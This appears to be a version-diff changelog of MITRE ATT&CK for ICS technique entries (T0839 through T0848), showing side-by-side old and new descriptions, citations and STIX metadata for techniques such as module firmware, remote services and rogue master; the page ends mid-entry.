t1Adversaries may install malicious or vulnerable firmware ontt1Adversaries may install malicious or vulnerable firmware ont
>o modular hardware devices. Control system devices often con>o modular hardware devices. Control system devices often con
>tain modular hardware devices. These devices may have their >tain modular hardware devices. These devices may have their 
>own set of firmware that is separate from the firmware of th>own set of firmware that is separate from the firmware of th
>e main control system equipment.   This technique is similar>e main control system equipment.     This technique is simil
> to <span class="smw-format list-format "><span class="smw-r>ar to [System Firmware](https://attack.mitre.org/techniques/
>ow"><span class="smw-field"><span class="smw-value">System F>T0857), but is conducted on other system components that may
>irmware</span></span></span></span>, but is conducted on oth> not have the same capabilities or level of integrity checki
>er system components that may not have the same capabilities>ng. Although it results in a device re-image, malicious devi
> or level of integrity checking. Although it results in a de>ce firmware may provide persistent access to remaining devic
>vice re-image, malicious device firmware may provide persist>es. (Citation: Daniel Peck,  Dale Peterson January 2009)    
>ent access to remaining devices. (Citation: References - Mod>An easy point of access for an adversary is the Ethernet car
>ule Firmware)  An easy point of access for an adversary is t>d, which may have its own CPU, RAM, and operating system. Th
>he Ethernet card, which may have its own CPU, RAM, and opera>e adversary may attack and likely exploit the computer on an
>ting system. The adversary may attack and likely exploit the> Ethernet card. Exploitation of the Ethernet card computer m
> computer on an Ethernet card. Exploitation of the Ethernet >ay enable the adversary to accomplish additional attacks, su
>card computer may enable the adversary to accomplish additio>ch as the following: (Citation: Daniel Peck,  Dale Peterson 
>nal attacks, such as the following: (Citation: References - >January 2009)    * Delayed Attack - The adversary may stage 
>Module Firmware)  *Delayed Attack - The adversary may stage >an attack in advance and choose when to launch it, such as a
>an attack in advance and choose when to launch it, such as a>t a particularly damaging time.   * Brick the Ethernet Card 
>t a particularly damaging time.  *Brick the Ethernet Card - >- Malicious firmware may be programmed to result in an Ether
>Malicious firmware may be programmed to result in an Etherne>net card failure, requiring a factory return.   * Random Att
>t card failure, requiring a factory return.  *"Random" Attac>ack or Failure - The adversary may load malicious firmware o
>k or Failure - The adversary may load malicious firmware ont>nto multiple field devices. Execution of an attack and the t
>o multiple field devices. Execution of an attack and the tim>ime it occurs is generated by a pseudo-random number generat
>e it occurs is generated by a pseudo-random number generator>or.    * A Field Device Worm - The adversary may choose to i
>.   *A Field Device Worm - The adversary may choose to ident>dentify all field devices of the same model, with the end go
>ify all field devices of the same model, with the end goal o>al of performing a device-wide compromise.   * Attack Other 
>f performing a device-wide compromise.  *Attack Other Cards >Cards on the Field Device - Although it is not the most impo
>on the Field Device - Although it is not the most important >rtant module in a field device, the Ethernet card is most ac
>module in a field device, the Ethernet card is most accessib>cessible to the adversary and malware. Compromise of the Eth
>le to the adversary and malware. Compromise of the Ethernet >ernet card may provide a more direct route to compromising o
>card may provide a more direct route to compromising other m>ther modules, such as the CPU module.
>odules, such as the CPU module. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 18:41:49.037000+00:00
descriptionAdversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. This technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: References - Module Firmware) An easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: References - Module Firmware) *Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. *Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. *"Random" Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. *A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. *Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. This technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) An easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) * Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. * Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. * Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. * A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. * Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0839https://attack.mitre.org/techniques/T0839
external_references[1]['source_name']References - Module FirmwareDaniel Peck, Dale Peterson January 2009
external_references[1]['description']Daniel Peck, Dale Peterson. (2009, January 28). Leveraging Ethernet Card Vulnerabilities in Field Devices. Retrieved December 19, 2017.Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19
external_references[1]['url']https://www.researchgate.net/publication/228849043%20Leveraging%20ethernet%20card%20vulnerabilities%20in%20field%20deviceshttps://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices

[T0840] Network Connection Enumeration

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may perform network connection enumeration to dit1Adversaries may perform network connection enumeration to di
>scover information about device communication patterns. If a>scover information about device communication patterns. If a
>n adversary can inspect the state of a network connection wi>n adversary can inspect the state of a network connection wi
>th tools, such as [https://en.wikipedia.org/wiki/Netstat net>th tools, such as Netstat(Citation: Netstat), in conjunction
>stat], in conjunction with <span class="smw-format list-form> with [System Firmware](https://attack.mitre.org/techniques/
>at "><span class="smw-row"><span class="smw-field"><span cla>T0857), then they can determine the role of certain devices 
>ss="smw-value">System Firmware</span></span></span></span>, >on the network  (Citation: MITRE). The adversary can also us
>then they can determine the role of certain devices on the n>e [Network Sniffing](https://attack.mitre.org/techniques/T08
>etwork  (Citation: EAttack System Network Connections Discov>42) to watch network traffic for details about the source, d
>ery). The adversary can also use Network Sniffing to watch n>estination, protocol, and content.
>etwork traffic for details about the source, destination, pr 
>otocol, and content. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 17:22:27.357000+00:00
descriptionAdversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as [https://en.wikipedia.org/wiki/Netstat netstat], in conjunction with System Firmware, then they can determine the role of certain devices on the network (Citation: EAttack System Network Connections Discovery). The adversary can also use Network Sniffing to watch network traffic for details about the source, destination, protocol, and content.Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0840https://attack.mitre.org/techniques/T0840
external_references[1]['source_name']EAttack System Network Connections DiscoveryMITRE
external_references[1]['description']MITRE. (n.d.). System Network Connections Discovery. Retrieved May 31, 2018.MITRE System Network Connections Discovery Retrieved. 2018/05/31
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Netstat', 'description': 'Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.', 'url': 'https://en.wikipedia.org/wiki/Netstat'}

[T0861] Point & Tag Identification

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may collect point and tag values to gain a more t1Adversaries may collect point and tag values to gain a more 
>comprehensive understanding of the process environment. Poin>comprehensive understanding of the process environment. Poin
>ts may be values such as inputs, memory locations, outputs o>ts may be values such as inputs, memory locations, outputs o
>r other process specific variables. (Citation: References - >r other process specific variables. (Citation: Dennis L. Slo
>tags process comprehension) Tags are the identifiers given t>atman September 2016) Tags are the identifiers given to poin
>o points for operator convenience.   Collecting such tags pr>ts for operator convenience.   Collecting such tags provides
>ovides valuable context to environmental points and enables > valuable context to environmental points and enables an adv
>an adversary to map inputs, outputs, and other values to the>ersary to map inputs, outputs, and other values to their con
>ir control processes. Understanding the points being collect>trol processes. Understanding the points being collected may
>ed may inform an adversary on which processes and values to > inform an adversary on which processes and values to keep t
>keep track of over the course of an operation.>rack of over the course of an operation.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 15:24:07.480000+00:00
descriptionAdversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: References - tags process comprehension) Tags are the identifiers given to points for operator convenience. Collecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. Collecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0861https://attack.mitre.org/techniques/T0861
external_references[1]['source_name']References - tags process comprehensionDennis L. Sloatman September 2016
external_references[1]['description']Benjamin Green. (n.d.). On the Significance of Process Comprehension for Conducting Targeted ICS Attacks. Retrieved November 1, 2019.Dennis L. Sloatman 2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19
external_references[1]['url']http://www.research.lancs.ac.uk/portal/files/196578358/sample%20sigconf.pdfhttps://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system

[T0843] Program Download

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may perform a program download to transfer a uset1Adversaries may perform a program download to transfer a use
>r program to a controller. ariations of program download, su>r program to a controller.   Variations of program download,
>ch as online edit and program append, allow a controller to > such as online edit and program append, allow a controller 
>continue running during the transfer and reconfiguration pro>to continue running during the transfer and reconfiguration 
>cess without interruption to process control. However, befor>process without interruption to process control. However, be
>e starting a full program download (i.e., download all) a co>fore starting a full program download (i.e., download all) a
>ntroller may need to go into a stop state. This can have neg> controller may need to go into a stop state. This can have 
>ative consequences on the physical process, especially if th>negative consequences on the physical process, especially if
>e controller is not able to fulfill a time-sensitive action.> the controller is not able to fulfill a time-sensitive acti
> Adversaries may choose to avoid a download all in favor of >on. Adversaries may choose to avoid a download all in favor 
>an online edit or program append to avoid disrupting the phy>of an online edit or program append to avoid disrupting the 
>sical process. An adversary may need to use the technique De>physical process. An adversary may need to use the technique
>tect Operating Mode or Change Operating Mode to make sure th> Detect Operating Mode or Change Operating Mode to make sure
>e controller is in the proper mode to accept a program downl> the controller is in the proper mode to accept a program do
>oad. The granularity of control to transfer a user program i>wnload.  The granularity of control to transfer a user progr
>n whole or parts is dictated by the management protocol (e.g>am in whole or parts is dictated by the management protocol 
>., S7CommPlus, TriStation) and underlying controller API. Th>(e.g., S7CommPlus, TriStation) and underlying controller API
>us, program download is a high-level term for the suite of v>. Thus, program download is a high-level term for the suite 
>endor-specific API calls used to configure a controller’s us>of vendor-specific API calls used to configure a controllers
>er program memory space. Modify Controller Tasking and Modif> user program memory space.    [Modify Controller Tasking](h
>y Program represent the configuration changes that are trans>ttps://attack.mitre.org/techniques/T0821) and [Modify Progra
>ferred to a controller via a program download.>m](https://attack.mitre.org/techniques/T0889) represent the 
 >configuration changes that are transferred to a controller v
 >ia a program download.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Joe Slowik - Dragos']
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 16:25:38.670000+00:00
descriptionAdversaries may perform a program download to transfer a user program to a controller. ariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download. The granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controller’s user program memory space. Modify Controller Tasking and Modify Program represent the configuration changes that are transferred to a controller via a program download.Adversaries may perform a program download to transfer a user program to a controller. Variations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download. The granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. [Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0843https://attack.mitre.org/techniques/T0843

[T0886] Remote Services

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may leverage remote services to move between asst1Adversaries may leverage remote services to move between ass
>ets and network segments. These services are often used to a>ets and network segments. These services are often used to a
>llow operators to interact with systems remotely within the >llow operators to interact with systems remotely within the 
>network, some examples are RDP, SMB, SSH, and other similar >network, some examples are RDP, SMB, SSH, and other similar 
>mechanisms. Remote services could be used to support remote >mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krot
>access, data transmission, authentication, name resolution, >ofil, Dan Scali, Nathan Brubaker, Christopher Glyer December
>and other remote functions. Further, remote services may be > 2017) (Citation: Dragos December 2017) (Citation: Joe Slowi
>necessary to allow operators and administrators to configure>k April 2019)   Remote services could be used to support rem
> systems within the network from their engineering or manage>ote access, data transmission, authentication, name resoluti
>ment workstations. An adversary may use this technique to ac>on, and other remote functions. Further, remote services may
>cess devices which may be dual-homed to multiple network seg> be necessary to allow operators and administrators to confi
>ments, and can be used for Program Download or to execute at>gure systems within the network from their engineering or ma
>tacks on control devices directly through Valid Accounts. Sp>nagement workstations. An adversary may use this technique t
>ecific remote services (RDP & VNC) may be a precursor to ena>o access devices which may be dual-homed (Citation: Blake Jo
>ble Graphical User Interface execution on devices such as HM>hnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubake
>Is or engineering workstation software. In the Oldsmar water>r, Christopher Glyer December 2017) to multiple network segm
> treatment attack, adversaries gained access to the system t>ents, and can be used for [Program Download](https://attack.
>hrough remote access software, allowing for the use of the s>mitre.org/techniques/T0843) or to execute attacks on control
>tandard operator HMI interface.(Citation: Oldsmar Water Trea> devices directly through [Valid Accounts](https://attack.mi
>tment Attack Feb 2021) Based on incident data, CISA and FBI >tre.org/techniques/T0859).  Specific remote services (RDP & 
>assessed that Chinese state-sponsored actors also compromise>VNC) may be a precursor to enable [Graphical User Interface]
>d various authorized remote access channels, including syste>(https://attack.mitre.org/techniques/T0823) execution on dev
>ms designed to transfer data and/or allow access between cor>ices such as HMIs or engineering workstation software.  Base
>porate and ICS networks.(Citation: CISA Chinese Gas Pipeline>d on incident data, CISA and FBI assessed that Chinese state
> Intrusion 2011 - 2013 July 2021)>-sponsored actors also compromised various authorized remote
 > access channels, including systems designed to transfer dat
 >a and/or allow access between corporate and ICS networks.  (
 >Citation: CISA AA21-201A Pipeline Intrusion July 2021)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Daisuke Suzuki']
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-30 15:01:43.553000+00:00
descriptionAdversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. Remote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed to multiple network segments, and can be used for Program Download or to execute attacks on control devices directly through Valid Accounts. Specific remote services (RDP & VNC) may be a precursor to enable Graphical User Interface execution on devices such as HMIs or engineering workstation software. In the Oldsmar water treatment attack, adversaries gained access to the system through remote access software, allowing for the use of the standard operator HMI interface.(Citation: Oldsmar Water Treatment Attack Feb 2021) Based on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) Remote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859). Specific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software. Based on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0886https://attack.mitre.org/techniques/T0886
external_references[1]['source_name']FireEye TRITON December 2017Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017
external_references[1]['description']Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer. (2017, December 14). Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure. Retrieved January 12, 2018.Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12
external_references[2]['source_name']Dragos TRISIS December 2017CISA AA21-201A Pipeline Intrusion July 2021
external_references[2]['description']Dragos. (2017, December 13). TRISIS Malware Analysis of Safety System Targeted Malware. Retrieved January 12, 2018.Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08
external_references[2]['url']https://dragos.com/blog/trisis/TRISIS-01.pdfhttps://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf
external_references[3]['source_name']Dragos IT ICS Ransomware December April 2019Dragos December 2017
external_references[3]['description']Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019.Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12
external_references[3]['url']https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/https://dragos.com/blog/trisis/TRISIS-01.pdf
external_references[4]['source_name']Oldsmar Water Treatment Attack Feb 2021Joe Slowik April 2019
external_references[4]['description']Pinellas County Sheriff’s Office. (2021, February 8). Treatment Plant Intrusion Press Conference. Retrieved October 8, 2021.Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27
external_references[4]['url']https://www.youtube.com/watch?v=MkXDSOgLQ6Mhttps://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsEngineering Workstation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021', 'description': 'ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.', 'url': 'https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf'}
x_mitre_platformsEngineering Workstation

[T0846] Remote System Discovery

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to get a listing of other systems byt1Adversaries may attempt to get a listing of other systems by
> IP address, hostname, or other logical identifier on a netw> IP address, hostname, or other logical identifier on a netw
>ork that may be used for subsequent Lateral Movement or Disc>ork that may be used for subsequent Lateral Movement or Disc
>overy techniques. Functionality could exist within adversary>overy techniques. Functionality could exist within adversary
> tools to enable this, but utilities available on the operat> tools to enable this, but utilities available on the operat
>ing system or vendor software could also be used.(Citation: >ing system or vendor software could also be used. (Citation:
>EAttack Remote System Discovery)> Enterprise ATT&CK January 2018)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-30 15:34:29.457000+00:00
descriptionAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used.(Citation: EAttack Remote System Discovery)Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0846https://attack.mitre.org/techniques/T0846
external_references[1]['source_name']EAttack Remote System DiscoveryEnterprise ATT&CK January 2018
external_references[1]['description']Enterprise ATT&CK. (2018, January 11). Remote System Discovery. Retrieved May 17, 2018.Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17

[T0888] Remote System Information Discovery

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1An adversary may attempt to get detailed information about rt1An adversary may attempt to get detailed information about r
>emote systems and their peripherals, such as make/model, rol>emote systems and their peripherals, such as make/model, rol
>e, and configuration. Adversaries may use information from R>e, and configuration. Adversaries may use information from R
>emote System Information Discovery to aid in targeting and s>emote System Information Discovery to aid in targeting and s
>haping follow-on behaviors. For example, the system’s operat>haping follow-on behaviors. For example, the systems operati
>ional role and model information can dictate whether it is a>onal role and model information can dictate whether it is a 
> relevant target for the adversary’s operational objectives.>relevant target for the adversary's operational objectives. 
> In addition, the system’s configuration may be used to scop>In addition, the systems configuration may be used to scope 
>e subsequent technique usage. Requests for system informatio>subsequent technique usage.   Requests for system informatio
>n are typically implemented using automation and management >n are typically implemented using automation and management 
>protocols and are often automatically requested by vendor so>protocols and are often automatically requested by vendor so
>ftware during normal operation. This information may be used>ftware during normal operation. This information may be used
> to tailor management actions, such as program download and > to tailor management actions, such as program download and 
>system or module firmware. An adversary may leverage this sa>system or module firmware. An adversary may leverage this sa
>me information by issuing calls directly to the system’s API>me information by issuing calls directly to the systems API.
>. 

Dropped Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 14:40:01.435000+00:00
descriptionAn adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system’s operational role and model information can dictate whether it is a relevant target for the adversary’s operational objectives. In addition, the system’s configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system’s API.An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the systems operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the systems configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the systems API.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0888https://attack.mitre.org/techniques/T0888
x_mitre_platforms[0]Safety Instrumented System/Protection RelayField Controller/RTU/PLC/IED
x_mitre_platforms[1]Field Controller/RTU/PLC/IEDSafety Instrumented System/Protection Relay

[T0848] Rogue Master

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may setup a rogue master to leverage control sert1Adversaries may setup a rogue master to leverage control ser
>ver functions to communicate with outstations. A rogue maste>ver functions to communicate with outstations. A rogue maste
>r can be used to send legitimate control messages to other c>r can be used to send legitimate control messages to other c
>ontrol system devices, affecting processes in unintended way>ontrol system devices, affecting processes in unintended way
>s. It may also be used to disrupt network communications by >s. It may also be used to disrupt network communications by 
>capturing and receiving the network traffic meant for the ac>capturing and receiving the network traffic meant for the ac
>tual master. Impersonating a master may also allow an advers>tual master. Impersonating a master may also allow an advers
>ary to avoid detection. In the Maroochy Attack, ViteBoden >ary to avoid detection.   In the Maroochy Shire attack, the 
>falsified network addresses in order to send false data and >adversary falsified networaddresses in order to send false
>instructions to pumping stations. In the case of the 2017 Da> data and instructions to pumping stations.(Citation: Marsha
>llas Siren incident, adversaries used a rogue master to send>ll Abrams July 2008)  In the case of the 2017 Dallas Siren i
> command messages to the 156 distributed sirens across the c>ncident, adversaries used a rogue master to send command mes
>ity, either through a single rogue transmitter with a strong>sages to the 156 distributed sirens across the city, either 
> signal, or using many distributed repeaters.>through a single rogue transmitter with a strong signal, or 
